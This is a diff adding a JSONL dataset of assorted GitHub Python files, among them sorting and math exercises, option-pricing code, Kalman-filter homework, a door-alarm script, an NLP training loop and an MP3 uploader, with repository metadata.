diff --git "a/300.jsonl" "b/300.jsonl" new file mode 100644--- /dev/null +++ "b/300.jsonl" @@ -0,0 +1,1850 @@ +{"seq_id":"11526586716","text":"# Given an array A[] consisting of only 0s, 1s, and 2s. The task is to write a function that sorts the given array. \n# The functions should put all 0s first, then all 1s and all 2s in last.\n# This problem is also the same as the famous “Dutch National Flag problem”.\n\ndef swap(a, b):\n return b, a\n\ndef sortArray(array, size):\n low, mid = 0, 0\n high = size - 1\n while(mid <= high):\n if(array[mid] == 0):\n array[low], array[mid] = swap(array[low], array[mid])\n low += 1\n mid += 1\n elif(array[mid] == 1):\n mid += 1\n else:\n array[mid], array[high] = swap(array[mid], array[high])\n high = high - 1\n return array\n\ndef printarray(array):\n for i in range(len(array)):\n print(array[i], end= \" \")\n\narr = [0, 1, 1, 0, 1, 2, 1, 2, 0, 0, 0, 1]\nsize = len(arr)\narray = sortArray(arr, size)\nprintarray(sortArray(arr, size))\n ","repo_name":"Sottim/DSAFromScratch","sub_path":"Arrays/sortArrayOf0s1sAnd2s.py","file_name":"sortArrayOf0s1sAnd2s.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12456850634","text":"\"\"\"test suite for set_api_url.py.\"\"\"\n\nimport unittest\nimport sys\nimport os\nsys.path.append(\"..\")\nimport set_api_url\nimport logging\nimport misc_utils.unittest_extend as ute\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass TestSetAPIUrl(unittest.TestCase):\n \"\"\"Test suite for set_api_url.py.\"\"\"\n\n def test_set_api_url(self):\n \"\"\"Returns NOne. Tests replacement of api url on test .js files.\"\"\"\n UI_path = './resources/'\n test_js_filename = 'test_main.js'\n new_js_filename = UI_path + 'main_blabla.js'\n reference_js = UI_path + 'test_main_reference.js'\n\n os.system('cp {} {}'.format(\n UI_path + test_js_filename,\n new_js_filename))\n\n api_url = 'https://app.etabot.ai:8000/api/'\n set_api_url.set_api_url(\n UI_path, api_url, api_url_var_name='apiUrl')\n\n ute.assertFileEqual(new_js_filename, reference_js, self)\n os.remove(new_js_filename)\n\nunittest.main()\n","repo_name":"ShanshanHe/pmp","sub_path":"etabotsite/etabotapp/tests/test_set_api_url.py","file_name":"test_set_api_url.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23908608296","text":"import random\n\nfrom cminer.consts import COIN\nfrom cminer.logger import logger\nfrom cminer.system import System\n\n\nclass MineProgress:\n def __init__(self, level):\n self.level = level\n self.mine = None\n self.dig_deeper(0, is_initial=True)\n\n def dig_by(self, axe, player):\n axe_broken = False\n coin = 0\n items = dict()\n\n damage = axe.damage_on_hardness(self.mine.model.hardness)\n if random.random() < player.crit_prob:\n logger.info('****** CRITICAL **')\n damage *= player.crit_damage\n self.mine.status.hp_now -= damage\n logger.debug(f'用 {axe} 造成了 {damage} 点伤害')\n axe.status.endurance -= 1\n\n if axe.status.endurance <= 0:\n axe_broken = True\n logger.info(f'{axe} 坏了')\n else:\n logger.debug(f'{axe} 耐久 '\n f'{axe.status.endurance}/{axe.model.endurance}')\n if self.mine.status.hp_now <= 0:\n _awards = self.mine.award\n for k, v in _awards.items():\n if k == COIN:\n coin = v\n else:\n items[System.item(k)] = v\n awards_text = [f'{v}个 {k}'\n for k, v in items.items()]\n awards_text += [f'{coin}枚 金幣']\n awards_text = '獲得: ' + ', '.join(awards_text)\n logger.info(awards_text)\n self.dig_deeper(player.lucky_prob)\n else:\n logger.debug(f'{self.mine}剩餘血量 '\n f'{self.mine.status.hp_now}/{self.mine.status.hp}')\n return dict(\n axe_broken=axe_broken,\n awards=dict(\n coin=coin,\n items=items,\n ),\n mine_level=self.level\n )\n\n def dig_deeper(self, lucky, is_initial=False):\n if not is_initial:\n self.level += 1\n self.mine = System.mine_at_level(self.level, lucky)\n logger.info(f'到达{self.level}层, 发现 {self.mine}, '\n f'血量: {self.mine.status.hp}')\n return self.level\n\n","repo_name":"monk-studio/cminer-profiler","sub_path":"cminer/core/archive/mine_progress.py","file_name":"mine_progress.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31314108467","text":"import math\nimport numpy as np\nfrom scipy.integrate import quad\n\n\ndef M76_call_value(mar_env):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach.\n Parameters\n ==========\n initial_value : float\n initial stock/index level\n strike : float\n strike price\n maturity : datetime object\n time-to-maturity (for t=0)\n short_rate : float\n constant risk-free short rate\n volatility : float\n volatility factor diffusion term\n lamb : float\n jump intensity\n mu : float\n expected jump size\n delta : float\n standard deviation of jump\n Returns\n =======\n call_value: float\n present value of European call option\n '''\n\n try:\n S0 = mar_env.get_constant('initial_value')\n K = mar_env.get_constant('strike')\n T = (mar_env.get_constant('maturity') -\n mar_env.pricing_date).days / 365.\n r = mar_env.get_curve('discount_curve').short_rate\n lamb = mar_env.get_constant('lambda')\n mu = mar_env.get_constant('mu')\n delta = mar_env.get_constant('delta')\n volatility = mar_env.get_constant('volatility')\n except:\n print('Error parsing market environment.')\n\n int_value = quad(lambda u:\n M76_int_func_sa(\n u, S0, K, T, r, volatility, lamb, mu, delta),\n 0, np.inf, limit=250)[0]\n call_value = max(0, S0 - np.exp(-r * T) * np.sqrt(S0 * K) /\n np.pi * int_value)\n return call_value\n\n\ndef M76_put_value(mar_env):\n ''' Valuation of European put option in M76 model via Lewis (2001)\n Fourier-based approach. '''\n\n try:\n S0 = mar_env.get_constant('initial_value')\n K = mar_env.get_constant('strike')\n T = (mar_env.get_constant('maturity') -\n mar_env.pricing_date).days / 365.\n r = mar_env.get_curve('discount_curve').short_rate\n except:\n print('Error parsing market environment.')\n\n call_value = M76_call_value(mar_env)\n put_value = call_value + K * math.exp(-r * T) - S0\n return put_value\n\n\ndef M76_int_func_sa(u, S0, K, T, r, volatility, lamb, mu, delta):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach: integration function.\n Parameter definitions see function M76_call_value.'''\n char_func_value = M76_char_func_sa(u - 0.5 * 1j, T, r, volatility,\n lamb, mu, delta)\n int_func_value = 1 / (u ** 2 + 0.25) \\\n * (np.exp(1j * u * np.log(S0 / K)) * char_func_value).real\n return int_func_value\n\n\ndef M76_char_func_sa(u, T, r, volatility, lamb, mu, delta):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach: characteristic function 'jump component'.\n Parameter definitions see function M76_call_value.'''\n omega = r - 0.5 * volatility ** 2 \\\n - lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n char_func_value = np.exp((1j * u * omega -\n 0.5 * u ** 2 * volatility ** 2 +\n lamb * (np.exp(1j * u * mu -\n u ** 2 * delta ** 2 * 0.5) - 1)) * T)\n return char_func_value","repo_name":"mccarvik/python_for_finance","sub_path":"dx/analytical/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39966415344","text":"import random\nimport math\n\ndef check_integer(nums):\n for num in nums:\n if num != int(num): \n raise TypeError('Argument must be an integer')\ndef check_nonneg_int(nums):\n try:\n check_integer(nums)\n except:\n raise TypeError('Argument must be a nonnegative integer')\n for num in nums:\n if num < 0:\n raise ValueError('Argument must be a nonnegative integer')\ndef check_pos_int(nums):\n try:\n check_integer(nums)\n except:\n raise TypeError('Argument must be a positive integer')\n for num in nums:\n if num < 1:\n raise ValueError('Argument must be a positive integer')\n\ndef gen_rand_poly(deg_lower_limit = 1, deg_upper_limit = 10, coeff_limit = 10):\n \"\"\"\n Generates a random polynomial with integer coefficients.\n \"\"\"\n deg = random.randint(deg_lower_limit,deg_upper_limit)\n coeffs = [random.randint(-coeff_limit, coeff_limit) for _ in range(deg+1)]\n\n # Never have 0 as leading coefficient\n if coeffs[deg] == 0:\n coeffs[deg] = 1\n\n def term(coeff, d):\n if coeff == 0:\n return ''\n elif d == 0:\n return (' + ' if coeff>0 else ' - ') + str(abs(coeff))\n elif d == 1:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x' if abs(coeff)!=1 else 'x')\n elif d == deg:\n return ('' if coeff>0 else '-') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n else:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n\n terms = [term(coeffs[d], d) for d in range(deg+1)]\n return deg, coeffs, ''.join([terms[d]for d in range(deg,-1,-1)]).strip('+ ')\n\ndef lcm(a,b):\n check_pos_int([a,b])\n out = a\n while out % b != 0:\n out += a\n return out\n\ndef gcf(a,b):\n check_pos_int([a,b])\n if a != round(a) or b != round(b):\n raise TypeError('Argument must be a positive integer')\n if a < 1 or b < 1:\n raise ValueError('Argument must be a positive integer')\n [x,y] = sorted([a,b])\n while (y % x != 0):\n y -= x\n [x,y] = sorted([x,y])\n return x\n\ndef factorial(n):\n check_nonneg_int([n])\n if n == 0: return 1\n return n * factorial(n-1)\n\ndef choose (n, k):\n check_nonneg_int([n,k])\n if n < k: return 0\n if k > n/2: \n k = n-k\n numer, denom = 1, 1\n for i in range(k):\n numer *= n-i\n denom *= i+1\n return int(numer/denom)\n\n","repo_name":"quadraticmuffin/discord-ftw","sub_path":"problem_gen/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18590680094","text":"n, k = map(int, input().split())\nresult = 0\n\n#n이 k보다 크거나 같을 경우에 반복\nwhile n >= k:\n #n이 k로 나누어 떨어지지 않으면 1씩 빼기\n while n % k != 0:\n n -= 1\n result += 1\n n //= k\n result += 1\n\n#n이 1일 때까지\nwhile n > 1:\n n -= 1\n result += 1\n\nprint(result)","repo_name":"kys910/pythonRidi","sub_path":"3_3.py","file_name":"3_3.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6322426642","text":"import numpy as np\n\ndef gamma_pseudoinverse(gmat, n):\n g = np.zeros_like(gmat)\n for i in range(n):\n g[i,i] = 1/ np.sqrt(1 + g[i,i])\n \n return g\n\nif __name__ =='__main__':\n x = 2 ** 0.5 * np.array([[1.0,1.0,0.0],[-1.0,0.0, 1.0],[0.0,-1.0,-1.0]])\n\n H = np.eye(3)\n R = np.eye(3)\n\n xdelta = x - x.mean(axis=0, keepdims=True)\n\n B = 0.5 * xdelta.T @ xdelta\n\n #H is identity\n K = B @ np.linalg.inv(B + R)\n\n #again, H is identity\n C = (H - K) @ B\n\n print(\"Posterior covariance: \", C)\n\n A = xdelta.T / (2 ** 0.5)\n\n V = H @ A\n\n F, sgm, W = np.linalg.svd(A.T @ A)\n sigma = np.diag(sgm)\n sigmaInv = np.linalg.pinv(sigma)\n\n sigmaPseudoId = sigmaInv @ sigma @ sigma @ sigmaInv\n\n #V^T V is Hermitian, and R is identity so V^T R V = V^T V\n Gamma, Q = np.linalg.eigh(V.T @ V)\n\n Gamma[0] = 0.0\n\n #2b\n\n GammaInv = np.diag(1.0/np.sqrt(Gamma + 1))\n\n C = A @ Q @ GammaInv @ sigmaPseudoId @ GammaInv @ Q.T @ A.T\n\n print(\"EAKF C: \", C)\n\n #2c, same as above, just flip the columns in Gamma and Q\n\n A = xdelta.T / (2 ** 0.5)\n\n V = H @ A\n\n F, sgm, W = np.linalg.svd(A.T @ A)\n sigma = np.diag(sgm)\n sigmaInv = np.linalg.pinv(sigma)\n\n sigmaPseudoId = sigmaInv @ sigma @ sigma @ sigmaInv\n Gamma, Q = np.linalg.eigh(V.T @ V)\n\n Qp = np.fliplr(Q)\n\n Gamma[0] = Gamma[2]\n Gamma[2] = 0.0\n\n GammaInv = np.diag(1.0/np.sqrt(Gamma + 1))\n\n print(sigmaPseudoId)\n\n C = A @ Qp @ GammaInv @ sigmaPseudoId @ GammaInv @ Qp.T @ A.T\n\n print(\"EAKF C: \", C)\n \n","repo_name":"DiffeoInvariant/Data-Assimilation","sub_path":"enkf/include/hw7.py","file_name":"hw7.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42726888078","text":"\"\"\"Unit tests for preprocessors.\"\"\"\nfrom bs4 import BeautifulSoup\n\nfrom fonduer.parser.preprocessors.hocr_doc_preprocessor import HOCRDocPreprocessor\n\n\ndef test_hocrpreprocessor():\n \"\"\"Test hOCRDocPreprocessor with a simple hOCR.\"\"\"\n path = \"tests/data/hocr_simple/md.hocr\"\n preprocessor = HOCRDocPreprocessor(path=path)\n doc = next(iter(preprocessor))\n assert doc.name == \"md\"\n # the intermidiate attribute: \"fonduer\" should be removed.\n assert \"fonduer\" not in doc.text\n # number of \"left\" attribute is equal to that of \"ppageno\" - 1 (at ocr_page)\n assert doc.text.count(\"left\") == doc.text.count(\"ppageno\") - 1 == 24\n\n\ndef test_hocrpreprocessor_space_false():\n \"\"\"Test hOCRDocPreprocessor with space=False.\"\"\"\n path = \"tests/data/hocr_simple/japan.hocr\"\n preprocessor = HOCRDocPreprocessor(path=path, space=False)\n doc = next(iter(preprocessor))\n assert doc.name == \"japan\"\n # the intermidiate attribute: \"fonduer\" should be removed.\n assert \"fonduer\" not in doc.text\n\n soup = BeautifulSoup(doc.text, \"lxml\")\n element = soup.find(id=\"par_1_1\")\n\n # A token cannot contain \" \" (whitespace) as \"tokens\" are deliminated by a \" \".\n assert len(element.get(\"left\").split()) == len(element.get(\"tokens\").split()) == 59\n","repo_name":"HazyResearch/fonduer","sub_path":"tests/parser/test_preprocessor.py","file_name":"test_preprocessor.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":395,"dataset":"github-code","pt":"53"} +{"seq_id":"36086902834","text":"from grovepi import *\n\n\n\nbuzzer_pin = 2\nultrasonic_range = 8\n\npinMode(buzzer_pin,\"OUTPUT\")\npinMode(ultrasonic_range,\"INPUT\")\n\n\n\nfirst = True\nwhile True:\n\ttry:\n\t\tdistance = ultrasonicRead(ultrasonic_range)\n\t\n\t\tif first:\n\t\t\tinitial_distance = distance\n\t\t\tfirst = False\n\t\t\ttime.sleep(10)\n\t\tif initial_distance - distance > 10:\n\t\t\tdigitalWrite(buzzer_pin,1)\n\t\telse:\n\t\t\tdigitalWrite(buzzer_pin,0)\n\t\t\n\texcept KeyboardInterrupt:\n\t\tdigitalWrite(buzzer_pin,0)\n\t\tprint(\"KeyboardInterrupt\")\n\t\tbreak\n\texcept (TypeError,IOError) as e:\n\t\tprint('Error')\n\n","repo_name":"x17142849/webapp","sub_path":"door_alarm.py","file_name":"door_alarm.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662513311","text":"from sklearn.utils import shuffle\nfrom ontonotes_utils import *\nfrom loader_ontonotes_pronoun import *\nimport torch.optim as optim\nfrom torch import nn\nfrom pretrain_elmo_model import Model\nimport numpy as np\nfrom early_stopping import *\nimport torch\n\nclass Trainer:\n def __init__(self,\n train_feature,\n model,\n early_stopping_patience,\n learning_rate,\n num_epochs,\n batch_size,\n X_train,\n X_val,\n X_test,\n y_train,\n y_val,\n y_test,\n device: torch.DeviceObjType = 'cuda' if torch.cuda.is_available() else 'cpu'):\n\n self.train_feature = train_feature\n self.early_stopping_patience = early_stopping_patience\n self.X_train = X_train\n self.X_val = X_val\n self.X_test = X_test\n self.y_train = y_train\n self.y_val = y_val\n self.y_test = y_test\n\n self.device = device\n self.num_epochs = num_epochs\n self.batch_size = batch_size\n self.model = model.to(self.device)\n self.lr = learning_rate\n self.criterion = nn.BCELoss().to(self.device) # binary cross entropy\n self.optimizer = optim.AdamW(self.model.parameters(), lr=self.lr)\n self.seed = 20\n\n self.train_loss_path = \"../arrays/{train_feature}_train_loss.txt\".format(train_feature=self.train_feature)\n self.valid_loss_path = \"../arrays/{train_feature}_valid_loss.txt\".format(train_feature=self.train_feature)\n self.eva_path = \"../arrays/pretrain_{train_feature}_eva.txt\".format(train_feature=self.train_feature)\n\n self.train_loss_array = []\n self.valid_loss_array = []\n\n self.success_rate = None\n\n # for evaluation\n self.num_all_correct = 0\n self.num_all_anaphor = 0\n\n # eva_file\n with open('../evaluation/{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'w') as f:\n f.write('')\n\n # results_file\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'w') as f:\n f.write('')\n\n # losses file\n with open(self.train_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.train_loss_array))\n\n with open(self.valid_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.valid_loss_array))\n\n # new losses file\n self.avg_train_loss_path = \"../arrays/avg_{train_feature}_train_loss.txt\".format(train_feature=self.train_feature)\n self.avg_valid_loss_path = \"../arrays/avg_{train_feature}_valid_loss.txt\".format(train_feature=self.train_feature)\n self.avg_train_loss_array = []\n self.avg_valid_loss_array = []\n with open(self.avg_train_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.avg_train_loss_array))\n with open(self.avg_valid_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.avg_valid_loss_array))\n\n def train(self):\n sum_train_loss = 0\n sum_val_loss = 0\n\n # INITIALIZE THE EARLY STOPPING OBJECT\n early_stopping = EarlyStopping(self.train_feature, patience=self.early_stopping_patience, pretrain=True, save_model=True)\n\n ### FOR EVER EPOCHE\n for e in range(self.num_epochs): # loop over the dataset multiple times\n epoch_train_sample_pairs_len = 0\n epoch_val_sample_pairs_len = 0\n epoch_train_loss = 0.0\n\n # Shuffle the corpus\n X_train, y_train = shuffle(self.X_train, self.y_train, random_state=self.seed * e)\n X_val, y_val = shuffle(self.X_val, self.y_val, random_state=self.seed * e)\n\n ### TRAINING\n ### EVERY BATCH\n self.model.train()\n for X_batch, y_batch in zip(batch(X_train, self.batch_size), batch(y_train, self.batch_size)):\n self.optimizer.zero_grad() # zero the parameter gradients\n current_batch_size = len(X_batch)\n\n batch_concat_pairs, potential_slices = self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n for sample_results in batch_outputs:\n epoch_train_sample_pairs_len += len(sample_results)\n # if torch.cuda.is_available():\n flat_outputs = torch.cat([p for sample in batch_outputs for p in sample]).to(self.device)\n flat_labels = torch.Tensor([l for sample in y_batch for l in sample]).to(self.device)\n\n loss = self.criterion(flat_outputs, flat_labels)\n # Backward pass\n loss.backward()\n self.optimizer.step()\n epoch_train_loss += loss.item()\n sum_train_loss += loss.item()\n\n with open(self.train_loss_path, 'r') as f:\n try:\n self.train_loss_array = json.load(f)\n try:\n self.train_loss_array.append(loss.item())\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.train_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.train_loss_array))\n\n\n epoch_train_loss_avg = epoch_train_loss / len(X_train)\n with open(self.avg_train_loss_path, 'r') as f:\n try:\n self.avg_train_loss_array = json.load(f)\n try:\n self.avg_train_loss_array.append(epoch_train_loss_avg)\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.avg_train_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.avg_train_loss_array))\n\n ### VALIDATION => validate every epoch to find and save the best model\n epoch_valid_loss = 0.0\n self.model.eval()\n\n with torch.no_grad():\n for X_batch, y_batch in zip(batch(X_val, self.batch_size), batch(y_val, self.batch_size)):\n current_batch_size = len(X_batch)\n # Forward Pass\n batch_concat_pairs, potential_slices = self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n for sample_results in batch_outputs:\n epoch_val_sample_pairs_len += len(sample_results)\n flat_outputs = torch.cat([p for sample in batch_outputs for p in sample]).to(self.device)\n flat_labels = torch.Tensor([l for sample in y_batch for l in sample]).to(self.device)\n # Find the Loss\n loss = self.criterion(flat_outputs, flat_labels)\n # Calculate Loss\n epoch_valid_loss += loss.item()\n sum_val_loss += loss.item()\n\n with open(self.valid_loss_path, 'r') as f:\n try:\n self.valid_loss_array = json.load(f)\n try:\n self.valid_loss_array.append(loss.item())\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.valid_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.valid_loss_array))\n\n\n epoch_valid_loss_avg = epoch_valid_loss / len(X_val)\n with open(self.avg_valid_loss_path, 'r') as f:\n try:\n self.avg_valid_loss_array = json.load(f)\n try:\n self.avg_valid_loss_array.append(epoch_valid_loss_avg)\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.avg_valid_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.avg_valid_loss_array))\n\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write(\n 'Epoch {e} \\t\\t Training Loss: {epoch_train_loss} \\t\\t Validation Loss: {epoch_valid_loss}\\n\\n'.format(\n e=e + 1, epoch_train_loss=epoch_train_loss, epoch_valid_loss=epoch_valid_loss))\n\n early_stopping(epoch_valid_loss, self.model, self.optimizer, e)\n\n if early_stopping.early_stop_break_epoch == True:\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write('EARLY BREAK AT EPOCH {e}'.format(e=e + 1))\n break\n\n # EVALUATION\n with torch.no_grad():\n success_rate = self.evaluate(self.X_test, self.y_test, 200)\n success_rate_2 = self.num_all_correct / self.num_all_anaphor\n\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write('\\n\\n Success rate: {success_rate}'.format(success_rate=success_rate))\n f.write('\\n\\n Success rate2: {success_rate}'.format(success_rate=success_rate_2))\n\n\n with open(self.eva_path, \"w\") as fp:\n fp.write(json.dumps(str(success_rate) + '\\n' + 'success rate 2: ' + str(success_rate_2)))\n\n # EVALUATE the model\n def evaluate(self, X_test, y_test, num_evaSamples_to_save):\n '''\n Evaluate the model on the test set\n @return: Success rate = successfully resolved anaphors/number of all anaphors\n '''\n print('Evaluating...')\n ana_num_id = 0\n if ana_num_id < num_evaSamples_to_save:\n eva_file = open(\n '../evaluation/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature), 'a')\n all_ana_len = 0\n self.model.eval()\n correct = 0\n num_anaphors = 0\n\n # FOR EVERY ANAPHOR\n for X_batch, y_batch in zip(batch(X_test, self.batch_size), batch(y_test, self.batch_size)):\n current_batch_size = len(X_batch)\n all_ana_len += current_batch_size\n\n batch_concat_pairs, potential_slices = self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_label_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n ana_strs = [ana[\"tokens\"] for ana in X_batch]\n ana_contexts = [ana['context'] for ana in X_batch]\n golds_str = [ana[\"golds_str\"] for ana in X_batch]\n all_ps_strs = [[p[\"tokens\"] for p in ana[\"potential_antecedents\"]] for ana in X_batch]\n # EVERY SAMPLE\n i = 0\n for targets, ys in zip(batch_label_outputs, y_batch):\n num_anaphors += 1\n selected_index = targets.index(max(targets))\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('anaphor: ' + str(ana_strs[i]) + '\\n')\n eva_file.write('candidates: ' + str(all_ps_strs[i]) + '\\n')\n eva_file.write('gold: ' + str(golds_str[i]) + '\\n')\n eva_file.write('selected cand: ' + str(all_ps_strs[i][selected_index]) + '\\n')\n eva_file.write('context: ' + str(ana_contexts[i]) + '\\n')\n\n # if one of the candidates is gold\n if 1 in ys: # because its possible that none of the potential candicates is right(e.g. the gold antecedent is not in the 3 sents before)\n gold_and_coref_idxs = [i for i, val in enumerate(ys) if val == 1]\n if selected_index in gold_and_coref_idxs:\n correct += 1\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('right\\n')\n else:\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('wrong\\n')\n else:\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('wrong\\n')\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('\\n')\n i += 1\n ana_num_id += 1\n self.num_all_correct += correct\n self.num_all_anaphor += num_anaphors\n success_rate = correct / num_anaphors\n\n self.success_rate = success_rate\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature), 'a') as f:\n f.write('Anaphor ammounts: ' + str(num_anaphors))\n f.write('Success rate: ' + str(success_rate))\n if ana_num_id < num_evaSamples_to_save:\n eva_file.close()\n\n return success_rate\n\nif __name__ == '__main__':\n print('Loading datasets...')\n\n train_val_test = load_corpus_list()\n\n reduced_size_train = round(len(train_val_test[0][0])/5)\n reduced_size_test = round(len(train_val_test[1][0])/5)\n reduced_size_val = round(len(train_val_test[2][0])/5)\n\n X_train = train_val_test[0][0][:reduced_size_train]\n X_val = train_val_test[1][0][:reduced_size_test]\n X_test = train_val_test[2][0][:reduced_size_val]\n\n y_train = train_val_test[3][:-1][:reduced_size_train]\n y_val = train_val_test[4][:-1][:reduced_size_test]\n y_test = train_val_test[5][:-1][:reduced_size_val]\n\n early_stopping_patience = 10\n num_epochs = 100 # klowersa = 20\n learning_rate = 1e-6\n batch_size = 8 # the number of training examples utilized in one iteration = length of training samples\n elmo_emb_size = 256\n glove_emb_size = 300\n embedding_size = elmo_emb_size + glove_emb_size\n hidden_size = embedding_size # Klowersa: hidden size of the BiLSTM = word embedding dimensionality\n\n train_feature = '5DATA_4layer_5DATA_2dropout_NoLN_NoFea'\n\n model = Model(batch_size=batch_size,\n num_layers=1,\n distance_feature=False,\n grammar_role_feature=False,\n definiteness_feature=False,\n match_feature=False,\n synonym_feature=False,\n hypernym_feature=False)\n\n trainer = Trainer(train_feature,\n model,\n early_stopping_patience,\n learning_rate,\n num_epochs,\n batch_size,\n X_train,\n X_val,\n X_test,\n y_train,\n y_val,\n y_test)\n\n trainer.train()","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/pretrain_hold_out_train.py","file_name":"pretrain_hold_out_train.py","file_ext":"py","file_size_in_byte":15565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42875908691","text":"from pydub import AudioSegment\nimport requests\nimport platform\nimport os\nimport urllib.parse\n\n# print(platform.system())\n\nawsHost = 'http://mp3loudv4-env.eba-ngusggxk.ap-northeast-2.elasticbeanstalk.com/file/upload/1?'\nlocalHost = 'http://127.0.0.1:8080/file/upload/1?'\n\nrootDir = os.getcwd()\nseparater = \"\"\n\nif (platform.system() == 'Darwin'):\n AudioSegment.converter = '/usr/local/bin/ffmpeg'\n AudioSegment.ffmpeg = '/usr/local/bin/ffmpeg'\n AudioSegment.ffprobe = '/usr/local/bin/ffprobe'\n separater = '/'\nelse:\n AudioSegment.converter = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\n AudioSegment.ffmpeg = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\n AudioSegment.ffprobe = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffprobe.exe\"\n separater = '\\\\'\n\nrootDir += separater + 'res'\n\n\ndef upload_mp3(genre, title, artist):\n relativePath = \"res\" + separater + genre + separater\n params = {'genre': genre, 'title':title, 'artist':artist}\n url = awsHost + urllib.parse.urlencode(params)\n files = {\n 'mp3': open(relativePath + artist + ' - ' + title + '.mp3', 'rb'),\n 'image': open(relativePath + title + '.jpg', 'rb')\n }\n r = requests.post(url, files=files)\n print(r.text)\n\n\nfor subdir, dirs, files in os.walk(rootDir):\n for dir in dirs:\n genre = dir\n for subdir2, dirs2, files2 in os.walk(rootDir + separater + dir):\n for file in files2:\n if \".mp3\" in file:\n print(file)\n artist = file.split(\" - \")[0]\n title = file.split(\" - \")[1].split(\".\")[0]\n upload_mp3(genre, title, artist)\n\n\n# current_home = path.expanduser('~')\n# #search_dir = path.join(current_home + \"/Music/iTunes/iTunes Media/Music/Rush/Chronicles (Disc 2)/2-03 Limelight.mp3\") # noqa\n#\n# def track_info(filename):\n# \"\"\"Module Built To Read ID3 Track Data.\"\"\"\n# tag = id3.Tag()\n# tag.parse(filename)\n# a = load(filename)\n# print(\"# {}\".format('=' * 78))\n# print(\"Track Name: {}\".format(tag.title))\n# print(\"Track Artist: {}\".format(tag.artist))\n# print(\"Track Album: {}\".format(tag.album))\n# print(\"Track Duration: {}\".format(duration_from_seconds(a.info.time_secs)))\n# print(\"Track Number: {}\".format(tag.track_num))\n# print(\"Track BitRate: {}\".format(a.info.bit_rate))\n# print(\"Track BitRate: {}\".format(a.info.bit_rate_str))\n# print(\"Sample Rate: {}\".format(a.info.sample_freq))\n# print(\"Mode: {}\".format(a.info.mode))\n# print(\"# {}\".format('=' * 78))\n# print(\"Album Artist: {}\".format(tag.album_artist))\n# print(\"Album Year: {}\".format(tag.getBestDate()))\n# print(\"Album Recording Date: {}\".format(tag.recording_date))\n# 